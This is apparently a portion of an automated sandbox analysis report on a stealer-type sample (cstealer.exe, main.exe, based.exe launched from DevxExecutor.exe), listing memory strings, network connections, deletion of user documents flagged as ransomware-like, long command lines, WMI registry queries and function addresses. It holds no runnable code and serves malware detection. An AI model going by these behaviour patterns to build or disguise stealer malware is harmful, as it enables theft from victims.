                                Source: cstealer.exe, 00000003.00000003.2170388540.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2607686027.00000271D9960000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170218167.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2195916443.00000170DBC4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB7C4000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197454135.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197231319.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2312005258.00000201025C0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197406606.0000020102A6B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197166727.0000020102A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                Source: main.exe, main.exe, 00000008.00000002.2222098181.00007FF8A8D68000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2503405873.00007FF8A8798000.00000004.00000001.01000000.0000001C.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
                                Source: cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
                                Source: cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49718 version: TLS 1.2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Modifies existing user documents (likely ransomware behavior)
                                Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsx
                                Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsx
                                Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\DUUDTUBZFW.pdf
                                Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\DUUDTUBZFW.pdf
                                Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\PALRGUCVEH.docx
                                Source: cmd.exeProcess created: 50

                                System Summary

                                barindex
                                Very long command line found
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                Writes or reads registry keys via WMI
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC6728C8 NtEnumerateValueKey,NtEnumerateValueKey,3_2_00000271DC6728C8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E712828C8 NtEnumerateValueKey,NtEnumerateValueKey,7_2_0000014E712828C8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,7_2_0000014E7128253C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128202C NtQuerySystemInformation,StrCmpNIW,7_2_0000014E7128202C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71282B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,7_2_0000014E71282B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71282B2C: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,7_2_0000014E71282B2C
                                Source: C:\Users\user\Desktop\DevxExecutor.exeCode function: 0_2_00007FF848F00B950_2_00007FF848F00B95
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC6538A83_2_00000271DC6538A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC64D0E03_2_00000271DC64D0E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC641F2C3_2_00000271DC641F2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC6844A83_2_00000271DC6844A8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC67DCE03_2_00000271DC67DCE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC672B2C3_2_00000271DC672B2C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E10003_2_00007FF6957E1000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695807A9C3_2_00007FF695807A9C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958026C43_2_00007FF6958026C4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F3ED03_2_00007FF6957F3ED0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F8EF43_2_00007FF6957F8EF4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695804EFC3_2_00007FF695804EFC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958017203_2_00007FF695801720
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F86703_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F26843_2_00007FF6957F2684
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695806DCC3_2_00007FF695806DCC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F35403_2_00007FF6957F3540
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958075503_2_00007FF695807550
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E9D9B3_2_00007FF6957E9D9B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F20703_2_00007FF6957F2070
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F28903_2_00007FF6957F2890
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F86703_2_00007FF6957F8670
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF69580A7D83_2_00007FF69580A7D8
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FE80C3_2_00007FF6957FE80C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E9F3B3_2_00007FF6957E9F3B
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F67503_2_00007FF6957F6750
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957EA76D3_2_00007FF6957EA76D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F42D43_2_00007FF6957F42D4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E92D03_2_00007FF6957E92D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FF3203_2_00007FF6957FF320
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695804A603_2_00007FF695804A60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F22743_2_00007FF6957F2274
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958017203_2_00007FF695801720
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F2A943_2_00007FF6957F2A94
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F84BC3_2_00007FF6957F84BC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FAC503_2_00007FF6957FAC50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F24803_2_00007FF6957F2480
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FECA03_2_00007FF6957FECA0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695806B503_2_00007FF695806B50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E7B603_2_00007FF6957E7B60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491E5A03_2_00007FF8A491E5A0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49A05B03_2_00007FF8A49A05B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49155B03_2_00007FF8A49155B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49565903_2_00007FF8A4956590
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A496F5E03_2_00007FF8A496F5E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A498E5F03_2_00007FF8A498E5F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49145C03_2_00007FF8A49145C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491C5403_2_00007FF8A491C540
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49326803_2_00007FF8A4932680
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491A6203_2_00007FF8A491A620
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F66553_2_00007FF8A48F6655
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F665D3_2_00007FF8A48F665D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49747803_2_00007FF8A4974780
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491B7C03_2_00007FF8A491B7C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490B7703_2_00007FF8A490B770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F28883_2_00007FF8A48F2888
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49818E03_2_00007FF8A49818E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490A8C03_2_00007FF8A490A8C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49068003_2_00007FF8A4906800
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499F8103_2_00007FF8A499F810
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F41803_2_00007FF8A48F4180
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49121E03_2_00007FF8A49121E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49971D03_2_00007FF8A49971D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499E1D03_2_00007FF8A499E1D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490B1203_2_00007FF8A490B120
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49471503_2_00007FF8A4947150
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FE2203_2_00007FF8A48FE220
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49382703_2_00007FF8A4938270
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49923E03_2_00007FF8A49923E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49933D03_2_00007FF8A49933D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49083703_2_00007FF8A4908370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FA3703_2_00007FF8A48FA370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FF4B03_2_00007FF8A48FF4B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49814E03_2_00007FF8A49814E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49AC4D03_2_00007FF8A49AC4D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4901D903_2_00007FF8A4901D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4936DB03_2_00007FF8A4936DB0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F8DC03_2_00007FF8A48F8DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4966DC03_2_00007FF8A4966DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4967DD03_2_00007FF8A4967DD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494DD003_2_00007FF8A494DD00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4929D163_2_00007FF8A4929D16
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4974F903_2_00007FF8A4974F90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499EFE03_2_00007FF8A499EFE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4904FD03_2_00007FF8A4904FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499BF203_2_00007FF8A499BF20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490FF003_2_00007FF8A490FF00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A495BF703_2_00007FF8A495BF70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4944F503_2_00007FF8A4944F50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A495F0903_2_00007FF8A495F090
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F30D43_2_00007FF8A48F30D4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F60F03_2_00007FF8A48F60F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49480203_2_00007FF8A4948020
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491B0003_2_00007FF8A491B000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49499803_2_00007FF8A4949980
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49729E03_2_00007FF8A49729E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494B9203_2_00007FF8A494B920
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A493C9403_2_00007FF8A493C940
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4923A003_2_00007FF8A4923A00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F6A623_2_00007FF8A48F6A62
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4946B103_2_00007FF8A4946B10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494FB103_2_00007FF8A494FB10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F3B703_2_00007FF8A48F3B70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4977CD03_2_00007FF8A4977CD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4998C503_2_00007FF8A4998C50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E910004_2_00007FF6D6E91000
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E99D9B4_2_00007FF6D6E99D9B
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA86704_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E97B604_2_00007FF6D6E97B60
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB6B504_2_00007FF6D6EB6B50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB7A9C4_2_00007FF6D6EB7A9C
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAE80C4_2_00007FF6D6EAE80C
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EBA7D84_2_00007FF6D6EBA7D8
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA86704_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E9A76D4_2_00007FF6D6E9A76D
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA67504_2_00007FF6D6EA6750
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E99F3B4_2_00007FF6D6E99F3B
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA28904_2_00007FF6D6EA2890
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA20704_2_00007FF6D6EA2070
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB6DCC4_2_00007FF6D6EB6DCC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB75504_2_00007FF6D6EB7550
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA35404_2_00007FF6D6EA3540
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB17204_2_00007FF6D6EB1720
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB4EFC4_2_00007FF6D6EB4EFC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA8EF44_2_00007FF6D6EA8EF4
